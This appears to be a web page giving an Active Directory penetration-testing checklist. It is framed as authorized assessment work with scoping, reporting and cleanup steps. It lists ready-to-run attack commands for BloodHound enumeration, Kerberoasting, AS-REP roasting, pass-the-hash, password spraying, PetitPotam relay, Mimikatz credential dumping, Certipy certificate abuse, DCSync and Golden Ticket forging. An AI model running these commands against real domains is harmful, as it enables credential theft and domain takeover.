Infrastructure28 items

Active Directory Security Checklist

A targeted penetration testing checklist for Microsoft Active Directory environments. Covers domain enumeration, Kerberos attacks, ACL abuse, Group Policy exploitation, lateral movement, and domain dominance techniques used by real-world threat actors.

MITRE ATT&CKNIST SP 800-115CIS BenchmarksPTES

Progress: 0 of 28 items

Obtain domain-joined workstation or VPN access for testinginfo

Secure a testing position within the domain network with standard user credentials.

Identify domain controllers, forests, and trust relationships in scope

Document all AD domains, forests, and trust configurations included in the assessment.

Agree on testing boundaries for domain admin compromise attempts

Clarify whether achieving Domain Admin and demonstrating impact is in scope.

Confirm monitoring and detection capabilities are operational

Optionally coordinate with the SOC to evaluate detection of AD attack techniques.

Set up testing tools (BloodHound, Rubeus, Impacket, PowerView)

Prepare the AD attack toolkit and verify operational security for testing.

Collect domain topology using BloodHound/SharpHoundinfo

Run SharpHound collectors to map users, groups, computers, ACLs, and sessions.

Commands

bloodhound-python -d corp.local -u user -p Password1 -ns 10.0.0.1 -c All

SharpHound.exe -c All --zipfilename collection.zip

Evidence to capture

BloodHound graph screenshot showing the shortest path from a low-privilege user to Domain Admin, with each edge labelled.

References

BloodHound documentation

Enumerate privileged groups (Domain Admins, Enterprise Admins, Schema Admins)high

Identify all members of high-privilege groups and nested group memberships.

Commands

net group "Domain Admins" /domain

crackmapexec ldap 10.0.0.1 -u user -p pass --groups

Identify service accounts and their SPN registrationshigh

Enumerate accounts with ServicePrincipalNames set for Kerberoasting targets.

Commands

GetUserSPNs.py corp.local/user:Password1 -dc-ip 10.0.0.1

References

MITRE ATT&CK - Kerberoasting (T1558.003)

Map Group Policy Objects and identify security-relevant settingsmedium

Review GPOs for password policies, user rights assignments, and script deployments.

Commands

Get-GPO -All

Enumerate LAPS deployment and password retrieval permissionshigh

Check which accounts can read Local Administrator passwords managed by LAPS.

Commands

Get-LAPSPasswords.ps1

crackmapexec ldap 10.0.0.1 -u user -p pass -M laps

Identify computers with unconstrained delegation configuredcritical

Find systems with unconstrained or constrained delegation that could be abused for escalation.

Commands

Get-NetComputer -Unconstrained

findDelegation.py corp.local/user:Password1

References

MITRE ATT&CK - Use Alternate Authentication Material (T1550)

Perform Kerberoasting against discovered service accountscritical

Request TGS tickets for SPNs and crack them offline to recover service account passwords.

Commands

GetUserSPNs.py corp.local/user:Password1 -dc-ip 10.0.0.1 -request

hashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

Evidence to capture

output of GetUserSPNs.py with the captured TGS hash plus the hashcat result confirming the cracked plaintext password.

References

MITRE ATT&CK - Kerberoasting (T1558.003)

Attempt AS-REP Roasting on accounts without pre-authenticationhigh

Identify and exploit accounts with DONT_REQUIRE_PREAUTH flag set.

Commands

GetNPUsers.py corp.local/ -dc-ip 10.0.0.1 -usersfile users.txt -no-pass -format hashcat

hashcat -m 18200 -a 0 asrep.txt /usr/share/wordlists/rockyou.txt

References

MITRE ATT&CK - AS-REP Roasting (T1558.004)

Test for Pass-the-Hash and Pass-the-Ticket attackscritical

Use harvested NTLM hashes and Kerberos tickets to authenticate to other systems.

Commands

crackmapexec smb 10.0.0.0/24 -u Administrator -H <ntlm_hash>

evil-winrm -i 10.0.0.5 -u Administrator -H <ntlm_hash>

References

Check for password spraying opportunities against domain accountshigh

Test common passwords against all domain accounts while respecting lockout policies.

Commands

kerbrute passwordspray --dc 10.0.0.1 -d corp.local users.txt "Spring2026!"

crackmapexec smb 10.0.0.1 -u users.txt -p "Spring2026!" --continue-on-success

References

MITRE ATT&CK - Password Spraying (T1110.003)

Test for NTLM relay and coercion attacks (PetitPotam, PrinterBug)critical

Coerce authentication from domain controllers and relay to AD CS or LDAP services.

Commands

ntlmrelayx.py -t http://adcs.corp.local/certsrv/certfnsh.asp -smb2support --adcs

PetitPotam.py <attacker_ip> <dc_ip>

References

MITRE ATT&CK - Forced Authentication (T1187)

Assess LSASS credential protection (Credential Guard, PPL)high

Determine if credentials can be dumped from memory using Mimikatz or similar tools.

Commands

mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

References

MITRE ATT&CK - LSASS Memory (T1003.001)

Exploit ACL misconfigurations for privilege escalationcritical

Abuse GenericAll, WriteDacl, WriteOwner, and other dangerous ACEs identified by BloodHound.

References

BloodHound - Abuse Information

Test for AD Certificate Services (AD CS) abuse pathscritical

Check for vulnerable certificate templates (ESC1-ESC8) using Certify or Certipy.

Commands

certipy find -u user@corp.local -p Password1 -dc-ip 10.0.0.1 -vulnerable

certipy req -u user@corp.local -p Password1 -ca CORP-CA -template VulnerableTemplate -upn administrator@corp.local

Evidence to capture

certipy find output flagging the vulnerable template (ESC ID) plus the resulting issued certificate authenticating as Domain Admin.

References

Certipy documentation

Attempt to extract NTDS.dit for offline credential analysiscritical

Use DCSync, Volume Shadow Copy, or ntdsutil to extract the AD database.

Commands

secretsdump.py -just-dc corp.local/Administrator@10.0.0.1

Evidence to capture

truncated secretsdump output showing DCSync replication succeeded and a sample of extracted NTLM hashes (with KRBTGT hash redacted as appropriate).

References

MITRE ATT&CK - DCSync (T1003.006)

Test for cross-domain and cross-forest trust abusecritical

Exploit trust relationships using SID history injection or foreign group memberships.

References

MITRE ATT&CK - Domain Trust Discovery (T1482)

Verify Golden Ticket and Silver Ticket attack feasibilitycritical

Assess whether KRBTGT hash extraction would allow forged Kerberos ticket creation.

Commands

mimikatz "kerberos::golden /user:Administrator /domain:corp.local /sid:<SID> /krbtgt:<HASH> /ptt"

References

Test GPO abuse for code execution on domain-joined systemshigh

Check for GPO creation rights or modification permissions that could push malicious policies.

References

MITRE ATT&CK - Domain Policy Modification (T1484)

Create BloodHound attack path visualizations for stakeholders

Generate clear attack path graphs showing the chain from initial user to Domain Admin.

Document all credential exposure and password quality findings

Report on cracked passwords, password reuse, and policy compliance statistics.

Provide AD hardening recommendations with implementation priority

Recommend tiered administration, credential protection, and ACL remediation steps.

Map attack techniques to MITRE ATT&CK framework

Reference specific ATT&CK technique IDs for each attack used during the assessment.

Remove all persistence mechanisms and reset compromised credentials

Ensure all forged tickets, implants, and test accounts are removed and passwords are reset.

Related Vulnerabilities

Broken Access Control

critical

Identification and Authentication Failures

high

Security Misconfiguration

medium

Cryptographic Failures

high

Industries Using This Checklist

Financial Services & Banking

Government & Public Sector

Active Directory Security Checklist

Pre-Engagement

Domain Enumeration

Kerberos & Credential Attacks

Privilege Escalation & Domain Dominance

Reporting

Related Vulnerabilities

Industries Using This Checklist

Report Vulnerabilities Faster with Vulnsy